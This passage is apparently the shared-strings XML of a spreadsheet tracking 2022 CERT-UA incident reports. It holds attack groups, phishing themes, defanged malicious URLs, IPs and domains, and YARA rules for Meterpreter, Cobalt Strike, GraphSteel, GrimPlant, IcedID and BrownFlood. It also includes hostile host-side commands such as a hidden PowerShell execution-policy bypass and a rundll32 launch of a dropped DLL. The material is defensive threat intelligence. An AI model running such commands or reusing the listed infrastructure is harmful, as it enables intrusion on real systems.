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 state="visible" name="Аркуш2" sheetId="2" r:id="rId5"/>
  </sheets>
  <definedNames/>
  <calcPr/>
</workbook>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="4352" uniqueCount="703">
  <si>
    <t>News publication date</t>
  </si>
  <si>
    <t>Date</t>
  </si>
  <si>
    <t>CERT-UA#</t>
  </si>
  <si>
    <t>Attack group(s)</t>
  </si>
  <si>
    <t>Target</t>
  </si>
  <si>
    <t>Theme/Key words</t>
  </si>
  <si>
    <t>Framework/Tool/Exploit</t>
  </si>
  <si>
    <t>File extensions involved</t>
  </si>
  <si>
    <t>Type</t>
  </si>
  <si>
    <t>Code</t>
  </si>
  <si>
    <t>Possible outcome</t>
  </si>
  <si>
    <t>Network info</t>
  </si>
  <si>
    <t>Host info</t>
  </si>
  <si>
    <t>Yara</t>
  </si>
  <si>
    <t>Short description</t>
  </si>
  <si>
    <t>URL(source)</t>
  </si>
  <si>
    <t>Status</t>
  </si>
  <si>
    <t>CVE</t>
  </si>
  <si>
    <t>CWE</t>
  </si>
  <si>
    <t>CVSS Score</t>
  </si>
  <si>
    <t>CERT-UA#4560</t>
  </si>
  <si>
    <t>TrickBot (UAC-0098);Unknown</t>
  </si>
  <si>
    <t>Email's receiver</t>
  </si>
  <si>
    <t>Указ, Президент України, Заходи безпеки; ua</t>
  </si>
  <si>
    <t>Metasploit, PowerShell, lnk shortcut, Meterpreter, in-memory DLL injection</t>
  </si>
  <si>
    <t>iso, doc, lnk, ps1, exe</t>
  </si>
  <si>
    <t>Malware distribution,Unauthorised access to information,Unauthorised modification of information</t>
  </si>
  <si>
    <t>"02.02", "07.00"</t>
  </si>
  <si>
    <t>Remote control of the device, Operations with the file system, RCE, Payload execution</t>
  </si>
  <si>
    <t>admin@rs500cosworth.com
tcp://195[.]211.99.29:28334
195[.]211.99.29</t>
  </si>
  <si>
    <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -exec bypass -w h -file z.ps1</t>
  </si>
  <si>
    <t>rule meterpreter_reverse_tcp_shellcode {
    meta:
        author = "FDD @ Cuckoo sandbox"
        description = "Rule for metasploit's  meterpreter reverse tcp raw shellcode"
    strings:
        $s1 = { fce8 8?00 0000 60 }     // shellcode prologe in metasploit
        $s2 = { 648b ??30 }             // mov edx, fs:[???+0x30]
        $s3 = { 4c77 2607 }             // kernel32 checksum
        $s4 = "ws2_"                    // ws2_32.dll
        $s5 = { 2980 6b00 }             // WSAStartUp checksum
        $s6 = { ea0f dfe0 }             // WSASocket checksum
        $s7 = { 99a5 7461 }             // connect checksum
    condition:
        all of them and filesize &lt; 5KB
}
rule meterpreter_reverse_tcp_shellcode_rev1 {
    meta:
        author = "FDD @ Cuckoo sandbox"
        description = "Meterpreter reverse TCP shell rev1"
        LHOST = 0xae
        LPORT = 0xb5
    strings:
        $s1 = { 6a00 53ff d5 }
    condition:
        meterpreter_reverse_tcp_shellcode and $s1 in (270..filesize)
}
rule meterpreter_reverse_tcp_shellcode_rev2 {
    meta:
        author = "FDD @ Cuckoo sandbox"
        description = "Meterpreter reverse TCP shell rev2"
        LHOST = 194
        LPORT = 201
    strings:
        $s1 = { 75ec c3 }
    condition:
        meterpreter_reverse_tcp_shellcode and $s1 in (270..filesize)
}
rule meterpreter_reverse_tcp_shellcode_domain {
    meta:
        author = "FDD @ Cuckoo sandbox"
        description = "Variant used if the user specifies a domain instead of a hard-coded IP"
    strings:
        $s1 = { a928 3480 }             // Checksum for gethostbyname
        $domain = /(\w+\.)+\w{2,6}/
    condition:
        meterpreter_reverse_tcp_shellcode and all of them
}
rule metasploit_download_exec_shellcode_rev1 {
    meta:
        author = "FDD @ Cuckoo Sandbox"
        description = "Rule for metasploit's download and exec shellcode"
        name = "Metasploit download &amp; exec payload"
        URL = 185
    strings:
        $s1 = { fce8 8?00 0000 60 }     // shellcode prologe in metasploit
        $s2 = { 648b ??30 }             // mov edx, fs:[???+0x30]
        $s4 = { 4c77 2607 }             // checksum for LoadLibraryA
        $s5 = { 3a56 79a7 }             // checksum for InternetOpenA
        $s6 = { 5789 9fc6 }             // checksum for InternetConnectA
        $s7 = { eb55 2e3b }             // checksum for HTTPOpenRequestA
        $s8 = { 7546 9e86 }             // checksum for InternetSetOptionA
        $s9 = { 2d06 187b }             // checksum for HTTPSendRequestA
        $url = /\/[\w_\-\.]+/
    condition:
        all of them and filesize &lt; 5KB
}
rule metasploit_download_exec_shellcode_rev2 {
    meta:
        author = "FDD @ Cuckoo Sandbox"
        description = "Rule for metasploit's download and exec shellcode"
        name = "Metasploit download &amp; exec payload"
        URL = 185
    strings:
        $s1 = { fce8 8?00 0000 60 }     // shellcode prologe in metasploit
        $s2 = { 648b ??30 }             // mov edx, fs:[???+0x30]
        $s4 = { 4c77 2607 }             // checksum for LoadLibraryA
        $s5 = { 3a56 79a7 }             // checksum for InternetOpenA
        $s6 = { 5789 9fc6 }             // checksum for InternetConnectA
        $s7 = { eb55 2e3b }             // checksum for HTTPOpenRequestA
        $s9 = { 2d06 187b }             // checksum for HTTPSendRequestA
        $url = /\/[\w_\-\.]+/
    condition:
        all of them and filesize &lt; 5KB
}
rule metasploit_bind_shell {
    meta:
        author = "FDD @ Cuckoo Sandbox"
        description = "Rule for metasploit's bind shell shellcode"
        name = "Metasploit bind shell payload"
    strings:
        $s1 = { fce8 8?00 0000 60 }     // shellcode prologe in metasploit
        $s2 = { 648b ??30 }             // mov edx, fs:[???+0x30]
        $s3 = { 4c77 2607 }             // checksum for LoadLibraryA
        $s4 = { 2980 6b00 }             // checksum for WSAStartup
        $s5 = { ea0f dfe0 }             // checksum for WSASocketA
        $s6 = { c2db 3767 }             // checksum for bind
        $s7 = { b7e9 38ff }             // checksum for listen
        $s8 = { 74ec 3be1 }             // checksum for accept
    condition:
        all of them and filesize &lt; 5KB
}</t>
  </si>
  <si>
    <t>zip, doc, lnk, exe</t>
  </si>
  <si>
    <t>https://cert.gov.ua/article/39934</t>
  </si>
  <si>
    <t>Detected</t>
  </si>
  <si>
    <t>-</t>
  </si>
  <si>
    <t>CERT-UA#4553</t>
  </si>
  <si>
    <t>UAC-0101;Unknown</t>
  </si>
  <si>
    <t>web resources of Ukraine</t>
  </si>
  <si>
    <t>JavaScript, BrownFlood</t>
  </si>
  <si>
    <t>DoS/DDoS</t>
  </si>
  <si>
    <t>"06.01"</t>
  </si>
  <si>
    <t>Denial of Service</t>
  </si>
  <si>
    <t>hxxp://cmtheodor[.]be
hxxp://staystrongjewels[.]com
hxxp://kesp[.]cl
hxxp://moskeet[.]com
hxxp://timeandbright[.]com
hxxp://winchconstruction[.]com
hxxp://nejsemlama[.]cz
hxxp://mitraseo[.]hol[.]es
hxxp://blog[.]gocon[.]in
hxxp://anniversarygiftsforcouples[.]com
hxxp://granitecsinks[.]ca
hxxp://easternexecutiveclub[.]com
hxxp://economiquity[.]org
hxxp://enlamentedeunasesor[.]com
hxxp://fan-guy[.]com
hxxp://garagemusicschool[.]it
hxxp://iforma[.]es
hxxp://inter-webservices[.]com
hxxp://karunadana[.]org
hxxp://pius-studio[.]at
hxxp://ludepa[.]ec
hxxp://e-wwg[.]com
hxxp://brunoboys[.]net
hxxp://lesrochersblancs[.]com
hxxp://lonelyatthetop[.]com
hxxp://sea-dobbiaco.bz[.]it
hxxp://gopoppers[.]com
hxxp://aspe[.]ro
hxxp://podologaneri[.]it
hxxp://cuts-international[.]org
hxxp://texlidia[.]com
hxxp://programasparapc[.]net
hxxp://hamnavard.sharif[.]ir/wp-content/plugins/visitors-traffic-real-time-statistics/js/front.js?ver=5.6.8
hxxps://xcasinobonuses[.]net/wp-content/themes/xcasinobonuses/js/bootstrap.min.js
hxxps://olei[.]ro/wp-content/plugins/translatepress-multilingual/assets/js/trp-frontend-compatibility.js
hxxps://floorfix.com[.]au/wp-content/themes/evolve/library/media/js/parallax/parallax.js?ver=5.1.13</t>
  </si>
  <si>
    <t>rule MAL_BrownFlood_1
{
 meta:
  description = "To detect BrownFlood JavaScript DDoS implant"
  author = "CERT-UA"
  created = "2022-04-27"
  version = 2
 strings:
  $s1 = "://"
  $s2 = " fetch("
  $f1 = "AbortController()"
  $f2 = "Math.random()"
  $f3 = "await "
  $f4 = ".shift("
  $f5 = ".push("
  $m1 = "GET"
  $m2 = "no-cors"
  $a1 = "fetchWithTimeout"
  $a2 = "CONCURRENCY_LIMIT"
  $a3 = "flood"
 condition:
  (
   all of ($s*) and
   for all of ($f*): (# == 1) and
   all of ($m*)
  ) or
  (
   all of ($s*) and
   2 of ($a*)
  )
}
rule MAL_BrownFlood_2
{
 meta:
  description = "To detect BrownFlood JavaScript DDoS implant (base64 encoded)"
  author = "CERT-UA"
  created = "2022-04-27"
  version = 2
 strings:
  $s1 = "http://" base64
  $s2 = "https://" base64
  $i = " fetch(" base64
  $f1 = "AbortController()" base64
  $f2 = "Math.random()" base64
  $f3 = "await " base64
  $f4 = ".shift(" base64
  $f5 = ".push(" base64
  $m1 = "GET" base64
  $m2 = "no-cors" base64
  $a1 = "fetchWithTimeout" base64
  $a2 = "CONCURRENCY_LIMIT" base64
  $a3 = "flood" base64
 condition:
  (
   any of ($s*) and
   $i and
   for all of ($f*): (# &lt; 6) and
   all of ($m*)
  )
  or
  (
   any of ($s*) and
   $i and
   2 of ($a*)
  )
}</t>
  </si>
  <si>
    <t>DDoS-атаки, для реалізації яких зловмисники розміщують шкідливий JavaScript-код (BrownFlood) у структурі веб-сторінок та файлах скомпрометованих веб-сайтів (переважно, під управлінням WordPress), в результаті чого обчислювальні ресурси комп'ютерів відвідувачів таких веб-сайтів використовуються для генерації аномальної кількості запитів до об'єктів атаки, URL-адреси яких статично визначено в шкідливому JavaScript-коді.
Згаданий шкідливий JavaScript-код може бути розміщено в структурі штатних файлів веб-сайту (HTML, JavaScript тощо), в тому числі, в base64-кодованому вигляді.
Виходячи з дослідженої версії BrownFlood, URI формується функцією Math.random().</t>
  </si>
  <si>
    <t>https://cert.gov.ua/article/39923</t>
  </si>
  <si>
    <t>CERT-UA#4545</t>
  </si>
  <si>
    <t>UAC-0056;Russia APT</t>
  </si>
  <si>
    <t>COVID-19; en</t>
  </si>
  <si>
    <t xml:space="preserve">Hidden macros, Go-downloader, GraphSteel, GrimPlant, WebSocket, GraphQL, gRPC </t>
  </si>
  <si>
    <t>xls, exe</t>
  </si>
  <si>
    <t>Malware distribution,Phishing,Unauthorised access to information</t>
  </si>
  <si>
    <t>"02.02", "03.03", "07.01"</t>
  </si>
  <si>
    <t>Stolen personal data, Read files, RCE</t>
  </si>
  <si>
    <t>hxxps://212[.]192.246.115/i
hxxps://212[.]192.246.115/m
hxxps://212[.]192.246.115/p
ws://212[.]192.246.115:443/c
212[.]192.246.115</t>
  </si>
  <si>
    <t>%USERPROFILE%\.java-sdk\java-sdk.exe
%USERPROFILE%\.java-sdk\microsoft-cortana.exe
%USERPROFILE%\.java-sdk\oracle-java.exe</t>
  </si>
  <si>
    <t>rule win_graphsteel_auto {
    meta:
        author = "Felix Bilstein - yara-signator at cocacoding dot com"
        date = "2022-04-08"
        version = "1"
        description = "Detects win.graphsteel."
        info = "autogenerated rule brought to you by yara-signator"
        tool = "yara-signator v0.6.0"
        signator_config = "callsandjumps;datarefs;binvalue"
        malpedia_reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.graphsteel"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8b8c2484000000 8d42ff 85c9 0f49c1 498b4d00 80796100 4189c3 }
            // n = 7, score = 100
            //   8b8c2484000000       | pop                 edi
            //   8d42ff               | pop                 ebp
            //   85c9                 | ja                  0xca
            //   0f49c1               | dec                 eax
            //   498b4d00             | mov                 esi, 0x3e01
            //   80796100             | add                 eax, 0x48000003
            //   4189c3               | bt                  esi, edx
        $sequence_1 = { ff15???????? 48c7434000000000 ff15???????? 4c8b4b30 b90a180000 c74424202ab30000 894320 }
            // n = 7, score = 100
            //   ff15????????         |                     
            //   48c7434000000000     | lea                 eax, dword ptr [0x3cc23b]
            //   ff15????????         |                     
            //   4c8b4b30             | dec                 eax
            //   b90a180000           | mov                 ebp, dword ptr [esp + 0xb8]
            //   c74424202ab30000     | dec                 eax
            //   894320               | add                 esp, 0xc0
        $sequence_2 = { eb0e 488d7848 488b4c2418 e8???????? 4889c3 488d05eebd4f00 488b6c2420 }
            // n = 7, score = 100
            //   eb0e                 | dec                 ecx
            //   488d7848             | mov                 ecx, dword ptr [edi + 0x50]
            //   488b4c2418           | mov                 eax, 2
            //   e8????????           |                     
            //   4889c3               | xor                 ebx, ebx
            //   488d05eebd4f00       | mov                 dword ptr [esp + 0x124], 0
            //   488b6c2420           | mov                 dword ptr [esp + 0xa0], 0
        $sequence_3 = { 8b430c 39f8 0f8fc5000000 c7430cffffffff 85ff 0f8efc000000 0f1f440000 }
            // n = 7, score = 100
            //   8b430c               | mov                 ecx, dword ptr [ebx + 0x10]
            //   39f8                 | dec                 eax
            //   0f8fc5000000         | mov                 ecx, dword ptr [ebx]
            //   c7430cffffffff       | dec                 esp
            //   85ff                 | lea                 eax, dword ptr [ebx + 0x28]
            //   0f8efc000000         | jne                 0x4a
            //   0f1f440000           | mov                 edx, 1
        $sequence_4 = { 8b8424f8000000 89742428 398424f0000000 8b442458 89442420 0f84fe080000 448b842488000000 }
            // n = 7, score = 100
            //   8b8424f8000000       | inc                 eax
            //   89742428             | movzx               edx, dh
            //   398424f0000000       | jmp                 0x351
            //   8b442458             | lea                 esi, dword ptr [edx - 0x41]
            //   89442420             | nop                 
            //   0f84fe080000         | inc                 eax
            //   448b842488000000     | cmp                 dh, 5
        $sequence_5 = { 754a 80b9a000000000 6690 753f 488d05d7153e00 e8???????? 48c7400850000000 }
            // n = 7, score = 100
            //   754a                 | cmp                 byte ptr [edx], 0xa4
            //   80b9a000000000       | dec                 eax
            //   6690                 | mov                 ebx, edx
            //   753f                 | je                  0x1f37
            //   488d05d7153e00       | xor                 eax, eax
            //   e8????????           |                     
            //   48c7400850000000     | dec                 eax
        $sequence_6 = { 498b07 4c89f9 ff5020 4c89e2 4c89e9 4883c428 415c }
            // n = 7, score = 100
            //   498b07               | dec                 ebp
            //   4c89f9               | imul                eax, eax, 0xa6f7d
            //   ff5020               | dec                 esp
            //   4c89e2               | sub                 eax, eax
            //   4c89e9               | dec                 edi
            //   4883c428             | lea                 eax, dword ptr [edi]
            //   415c                 | dec                 ebp
        $sequence_7 = { 898424e8000000 85c0 0f8534010000 488b0b 448b7914 4585ff 0f89b4feffff }
            // n = 7, score = 100
            //   898424e8000000       | jne                 0x4d
            //   85c0                 | dec                 eax
            //   0f8534010000         | lea                 edx, dword ptr [esp + 0xd0]
            //   488b0b               | mov                 ecx, 4
            //   448b7914             | jne                 0x65
            //   4585ff               | inc                 esp
            //   0f89b4feffff         | movzx               eax, byte ptr [ecx + 1]
        $sequence_8 = { eb2d 4889c8 4889fb 4889d1 e8???????? 83f001 488b4c2450 }
            // n = 7, score = 100
            //   eb2d                 | dec                 eax
            //   4889c8               | stosd               dword ptr es:[edi], eax
            //   4889fb               | dec                 eax
            //   4889d1               | mov                 dword ptr [esp + 0x30], 0
            //   e8????????           |                     
            //   83f001               | dec                 eax
            //   488b4c2450           | mov                 dword ptr [esp + 0x38], 0
        $sequence_9 = { b981000000 e8???????? 488d05673d5c00 bb1e000000 e8???????? 90 4889442408 }
            // n = 7, score = 100
            //   b981000000           | cmp                 ecx, edx
            //   e8????????           |                     
            //   488d05673d5c00       | je                  0xf8b
            //   bb1e000000           | dec                 eax
            //   e8????????           |                     
            //   90                   | lea                 edx, dword ptr [ecx + 1]
            //   4889442408           | cmp                 dl, 0x2e
    condition:
        7 of them and filesize &lt; 19812352
}
rule win_grimplant_auto {
    meta:
        author = "Felix Bilstein - yara-signator at cocacoding dot com"
        date = "2022-04-08"
        version = "1"
        description = "Detects win.grimplant."
        info = "autogenerated rule brought to you by yara-signator"
        tool = "yara-signator v0.6.0"
        signator_config = "callsandjumps;datarefs;binvalue"
        malpedia_reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.grimplant"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ffd1 488b4c2420 48f7c160000000 b900000000 ba20000000 480f45ca 4881c994000000 }
            // n = 7, score = 100
            //   ffd1                 | lea                 edi, dword ptr [eax + 0x18]
            //   488b4c2420           | dec                 eax
            //   48f7c160000000       | mov                 ecx, dword ptr [esp + 0x5b0]
            //   b900000000           | jne                 0xcd8
            //   ba20000000           | dec                 eax
            //   480f45ca             | mov                 ecx, dword ptr [esp + 0xb8]
            //   4881c994000000       | dec                 eax
        $sequence_1 = { eb1c 488b9424d8000000 488d4a01 488b8424c8000000 488b9c2418010000 48898c24d8000000 488b5028 }
            // n = 7, score = 100
            //   eb1c                 | mov                 ebx, 2
            //   488b9424d8000000     | mov                 ecx, 6
            //   488d4a01             | dec                 eax
            //   488b8424c8000000     | mov                 esi, dword ptr [esp + 0xa0]
            //   488b9c2418010000     | jge                 0xa0
            //   48898c24d8000000     | nop                 dword ptr [eax]
            //   488b5028             | dec                 eax
        $sequence_2 = { eb0e 488d3d22406e00 31c0 e8???????? 440f113d???????? 833d????????00 750d }
            // n = 7, score = 100
            //   eb0e                 | cmp                 byte ptr [eax], 0x31
            //   488d3d22406e00       | jne                 0x4d1
            //   31c0                 | jne                 0x1ad
            //   e8????????           |                     
            //   440f113d????????     |                     
            //   833d????????00       |                     
            //   750d                 | dec                 eax
        $sequence_3 = { 660f3a0fff08 66450f3a0fd20c 4c0317 4c135f08 4983d401 488b4500 4989c7 }
            // n = 7, score = 100
            //   660f3a0fff08         | mov                 dword ptr [esp + 0x18], edx
            //   66450f3a0fd20c       | dec                 eax
            //   4c0317               | lea                 edi, dword ptr [0x54a8d4]
            //   4c135f08             | nop                 dword ptr [eax]
            //   4983d401             | jmp                 0xa6b
            //   488b4500             | dec                 eax
            //   4989c7               | lea                 edx, dword ptr [0xb1972]
        $sequence_4 = { 4c8d4e01 6690 4c39cf 7334 488d05143c3300 4c89c3 4889f1 }
            // n = 7, score = 100
            //   4c8d4e01             | jne                 0x12ed
            //   6690                 | dec                 eax
            //   4c39cf               | mov                 ecx, dword ptr [esp + 0x28]
            //   7334                 | dec                 eax
            //   488d05143c3300       | mov                 eax, dword ptr [esp + 0x30]
            //   4c89c3               | dec                 eax
            //   4889f1               | lea                 ecx, dword ptr [0x45cfe0]
        $sequence_5 = { e9???????? 488d05bc6d1700 e8???????? 488d0db0022800 488908 833d????????00 750e }
            // n = 7, score = 100
            //   e9????????           |                     
            //   488d05bc6d1700       | dec                 eax
            //   e8????????           |                     
            //   488d0db0022800       | mov                 eax, ecx
            //   488908               | dec                 eax
            //   833d????????00       |                     
            //   750e                 | lea                 ecx, dword ptr [0x535463]
        $sequence_6 = { ffd6 488b4c2460 488b8980000000 488b442468 31db 31ff 4889ca }
            // n = 7, score = 100
            //   ffd6                 | dec                 eax
            //   488b4c2460           | mov                 dword ptr [eax + 0x30], edx
            //   488b8980000000       | jmp                 0x1241
            //   488b442468           | dec                 eax
            //   31db                 | lea                 edi, dword ptr [eax + 0x30]
            //   31ff                 | nop                 
            //   4889ca               | jne                 0x1245
        $sequence_7 = { e9???????? 4889c8 4889fb 4889d1 e8???????? 488b4c2478 4839cb }
            // n = 7, score = 100
            //   e9????????           |                     
            //   4889c8               | dec                 eax
            //   4889fb               | mov                 edi, dword ptr [esp + 0x18]
            //   4889d1               | dec                 eax
            //   e8????????           |                     
            //   488b4c2478           | cmp                 dword ptr [edx + 0x10], 0
            //   4839cb               | jne                 0x97d
        $sequence_8 = { eb0d 4889c7 488b4c2428 e8???????? 31c0 31db 488b6c2448 }
            // n = 7, score = 100
            //   eb0d                 | lea                 eax, dword ptr [0x1f4d97]
            //   4889c7               | dec                 eax
            //   488b4c2428           | mov                 dword ptr [eax + 8], 0x50
            //   e8????????           |                     
            //   31c0                 | jne                 0x33d
            //   31db                 | nop                 
            //   488b6c2448           | dec                 eax
        $sequence_9 = { e9???????? 4889d6 e8???????? 488b4c2458 4839c8 773e 488b742450 }
            // n = 7, score = 100
            //   e9????????           |                     
            //   4889d6               | dec                 eax
            //   e8????????           |                     
            //   488b4c2458           | mov                 ecx, dword ptr [esp + 0x20]
            //   4839c8               | dec                 eax
            //   773e                 | lea                 edi, dword ptr [ecx + 0x40]
            //   488b742450           | jne                 0xb6e
    condition:
        7 of them and filesize &lt; 19940352
}</t>
  </si>
  <si>
    <t>Від суб'єкту координації отримано електронний лист із вкладенням у вигляді XLS-документу "Aid request COVID-19-04_5_22.xls", що містить макрос. У випадку активації макросу, останній здійснить декодування пейлоаду, що знаходиться в прихованому аркуші документу, а також створення на диску і запуск Go-завантажувача. В подальшому, на комп'ютер будуть завантажені та виконані шкідливі програми GraphSteel (дата компіляції: 2022-04-21) та GrimPlant.</t>
  </si>
  <si>
    <t>https://cert.gov.ua/article/39882</t>
  </si>
  <si>
    <t>CERT-UA#4490</t>
  </si>
  <si>
    <t>Азовсталь, Військові; ua</t>
  </si>
  <si>
    <t>Hidden macros, Cobalt Strike Beacon</t>
  </si>
  <si>
    <t>xls, dll</t>
  </si>
  <si>
    <t>Remote control of the device, Operations with the file system, RCE</t>
  </si>
  <si>
    <t>hxxp://138[.]68.229.0/pe.dll
hxxps://dezword[.]com/apiv8/getStatus
hxxps://dezword[.]com/apiv8/updateConfig
84[.]32.188.29 (провайдер: @cherryservers[.]com)
138[.]68.229.0 (провайдер: @hostkey[.]com)
139[.]60.161.225
139[.]60.161.74
139[.]60.161.62
139[.]60.161.99
139[.]60.161.57
139[.]60.161.75
139[.]60.161.24
139[.]60.161.89
139[.]60.161.209
139[.]60.161.85
139[.]60.160.51
139[.]60.161.226
139[.]60.161.216
139[.]60.161.163
139[.]60.160.8
139[.]60.161.32
139[.]60.161.45
139[.]60.161.60
139[.]60.160.17
dezword[.]com (2022-03-22)
agreminj[.]com
akaluij[.]com
anidoz[.]com
apeduze[.]com
apokil[.]com
arentuk[.]com
axikok[.]com
azimurs[.]com
baidencult[.]com
billiopa[.]com
blinkij[.]com
blopik[.]com
borizhog[.]com
britxec[.]com
drimzis[.]com
fluoxi[.]com
shikjil[.]com
shormanz[.]com
verofes[.]com</t>
  </si>
  <si>
    <t>rundll32 C:\Windows\Tasks\pe.dll,DllRegisterServer
C:\Windows\Tasks\pe.dll</t>
  </si>
  <si>
    <t>rule win_cobalt_strike_auto {
    meta:
        author = "Felix Bilstein - yara-signator at cocacoding dot com"
        date = "2022-04-08"
        version = "1"
        description = "Detects win.cobalt_strike."
        info = "autogenerated rule brought to you by yara-signator"
        tool = "yara-signator v0.6.0"
        signator_config = "callsandjumps;datarefs;binvalue"
        malpedia_reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike"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e9???????? eb0a b801000000 e9???????? }
            // n = 4, score = 1800
            //   e9????????           |                     
            //   eb0a                 | jmp                 0xc
            //   b801000000           | mov                 eax, 1
            //   e9????????           |                     
        $sequence_1 = { 3bc7 750d ff15???????? 3d33270000 }
            // n = 4, score = 1800
            //   3bc7                 | cmp                 eax, edi
            //   750d                 | jne                 0xf
            //   ff15????????         |                     
            //   3d33270000           | cmp                 eax, 0x2733
        $sequence_2 = { ff7608 ff15???????? 8bf8 83c410 }
            // n = 4, score = 1100
            //   ff7608               | push                dword ptr [esi + 8]
            //   ff15????????         |                     
            //   8bf8                 | mov                 edi, eax
            //   83c410               | add                 esp, 0x10
        $sequence_3 = { ff7604 ff75fc ff15???????? 83c410 8bf8 }
            // n = 5, score = 1100
            //   ff7604               | push                dword ptr [esi + 4]
            //   ff75fc               | push                dword ptr [ebp - 4]
            //   ff15????????         |                     
            //   83c410               | add                 esp, 0x10
            //   8bf8                 | mov                 edi, eax
        $sequence_4 = { eb0d 6802010000 ff15???????? 33c0 }
            // n = 4, score = 1100
            //   eb0d                 | jmp                 0xf
            //   6802010000           | push                0x102
            //   ff15????????         |                     
            //   33c0                 | xor                 eax, eax
        $sequence_5 = { eb0b 8b45d4 83c010 8945d4 eb84 e9???????? 837d0c18 }
            // n = 7, score = 1100
            //   eb0b                 | jmp                 0xd
            //   8b45d4               | mov                 eax, dword ptr [ebp - 0x2c]
            //   83c010               | add                 eax, 0x10
            //   8945d4               | mov                 dword ptr [ebp - 0x2c], eax
            //   eb84                 | jmp                 0xffffff86
            //   e9????????           |                     
            //   837d0c18             | cmp                 dword ptr [ebp + 0xc], 0x18
        $sequence_6 = { ff760c 894518 ff15???????? 59 }
            // n = 4, score = 1100
            //   ff760c               | push                dword ptr [esi + 0xc]
            //   894518               | mov                 dword ptr [ebp + 0x18], eax
            //   ff15????????         |                     
            //   59                   | pop                 ecx
        $sequence_7 = { eb0c 890d???????? e8???????? 59 5f 5e 5d }
            // n = 7, score = 1100
            //   eb0c                 | jmp                 0xe
            //   890d????????         |                     
            //   e8????????           |                     
            //   59                   | pop                 ecx
            //   5f                   | pop                 edi
            //   5e                   | pop                 esi
            //   5d                   | pop                 ebp
        $sequence_8 = { e8???????? e9???????? 833d????????01 7505 }
            // n = 4, score = 1000
            //   e8????????           |                     
            //   e9????????           |                     
            //   833d????????01       |                     
            //   7505                 | jne                 7
        $sequence_9 = { 8bd0 e8???????? 85c0 7e0e }
            // n = 4, score = 1000
            //   8bd0                 | mov                 edx, eax
            //   e8????????           |                     
            //   85c0                 | test                eax, eax
            //   7e0e                 | jle                 0x10
        $sequence_10 = { 85c0 741d ff15???????? 85c0 7513 }
            // n = 5, score = 900
            //   85c0                 | test                eax, eax
            //   741d                 | je                  0x1f
            //   ff15????????         |                     
            //   85c0                 | test                eax, eax
            //   7513                 | jne                 0x15
        $sequence_11 = { 85c0 7405 e8???????? 8b0d???????? 85c9 }
            // n = 5, score = 800
            //   85c0                 | test                eax, eax
            //   7405                 | je                  7
            //   e8????????           |                     
            //   8b0d????????         |                     
            //   85c9                 | test                ecx, ecx
        $sequence_12 = { e8???????? 488b15???????? 4983c8ff 49ffc0 }
            // n = 4, score = 700
            //   e8????????           |                     
            //   488b15????????       |                     
            //   4983c8ff             | dec                 ecx
            //   49ffc0               | or                  eax, 0xffffffff
        $sequence_13 = { e8???????? 488b15???????? 6689441708 488d4c2420 }
            // n = 4, score = 700
            //   e8????????           |                     
            //   488b15????????       |                     
            //   6689441708           | inc                 edx
            //   488d4c2420           | cmp                 byte ptr [edx + eax], 0
        $sequence_14 = { 4883ec20 4c8bf1 8b0d???????? 418bf8 488bf2 }
            // n = 5, score = 700
            //   4883ec20             | lea                 ecx, dword ptr [esp + 0x20]
            //   4c8bf1               | dec                 esp
            //   8b0d????????         |                     
            //   418bf8               | mov                 eax, eax
            //   488bf2               | jmp                 0xc
        $sequence_15 = { 458d5a01 85db 7427 488d7dd0 418d4202 0fb60c30 }
            // n = 6, score = 700
            //   458d5a01             | mov                 eax, 1
            //   85db                 | cmp                 eax, edi
            //   7427                 | jne                 0x11
            //   488d7dd0             | cmp                 eax, 0x2733
            //   418d4202             | je                  0x1f
            //   0fb60c30             | test                eax, eax
    condition:
        7 of them and filesize &lt; 696320
}</t>
  </si>
  <si>
    <t>Виявлено факт розповсюдження електронних листів з темою "Срочно! Деблокация Азовстали Терміново! Розблокування «Азовсталі»" та додатком у вигляді XLS-документу "Військові на Азовсталі.xls", що містить макрос. У випадку відкриття документу та активації макросу, останній здійснить завантаження, створення на диску та запуск файлу "pe.dll". Зазначене призведе до ураження комп'ютера шкідливою програмою Cobalt Strike Beacon.</t>
  </si>
  <si>
    <t>https://cert.gov.ua/article/39708</t>
  </si>
  <si>
    <t>CERT-UA#4464</t>
  </si>
  <si>
    <t>Мобілізація; ua</t>
  </si>
  <si>
    <t>Hidden macros, banking Trojan, GzipLoader, IcedID(BankBot)</t>
  </si>
  <si>
    <t>xls, exe, dat, dll, bin</t>
  </si>
  <si>
    <t>Malware distribution, Phishing</t>
  </si>
  <si>
    <t>"02.02", "03.03"</t>
  </si>
  <si>
    <t>Stolen credentials</t>
  </si>
  <si>
    <t xml:space="preserve">rivertimad[.]com
winuvinnosluk[.]club
successilin[.]top
reteredelete[.]top
naffalno[.]site
ritionalvalueon[.]top
oceriesfornot[.]top
arelyevennot[.]top
dogiraftig[.]com
fikasterwer[.]top
jevejosader[.]top
ertimadifa[.]com
rresteraftin[.]com
ndlestomak[.]top
168[.]100.8.42
188[.]166.154.118
134[.]209.144.87
hXXp://168[.]100.8.42/micro[.]exe
hXXp://168[.]100.8.42/spisok[.]exe
hXXp://rivertimad[.]com/
hXXp://168[.]100.8.42/list[.]exe
</t>
  </si>
  <si>
    <t>%APPDATA%\%rand%\%rand%.dll",DllMain --iydu="SustainDream\license.dat"
%APPDATA%\SustainDream\license.dat
%APPDATA%\runsx.exe
%TMP%\forest32.dat</t>
  </si>
  <si>
    <t>rule win_icedid_auto {
    meta:
        author = "Felix Bilstein - yara-signator at cocacoding dot com"
        date = "2022-04-08"
        version = "1"
        description = "Detects win.icedid."
        info = "autogenerated rule brought to you by yara-signator"
        tool = "yara-signator v0.6.0"
        signator_config = "callsandjumps;datarefs;binvalue"
        malpedia_reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid"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ff15???????? 50 ff15???????? 8bf7 8bc6 eb02 }
            // n = 6, score = 1300
            //   ff15????????         |                     
            //   50                   | push                eax
            //   ff15????????         |                     
            //   8bf7                 | mov                 esi, edi
            //   8bc6                 | mov                 eax, esi
            //   eb02                 | jmp                 4
        $sequence_1 = { 742c 803e00 7427 6a3b 56 ff15???????? }
            // n = 6, score = 1300
            //   742c                 | je                  0x2e
            //   803e00               | cmp                 byte ptr [esi], 0
            //   7427                 | je                  0x29
            //   6a3b                 | push                0x3b
            //   56                   | push                esi
            //   ff15????????         |                     
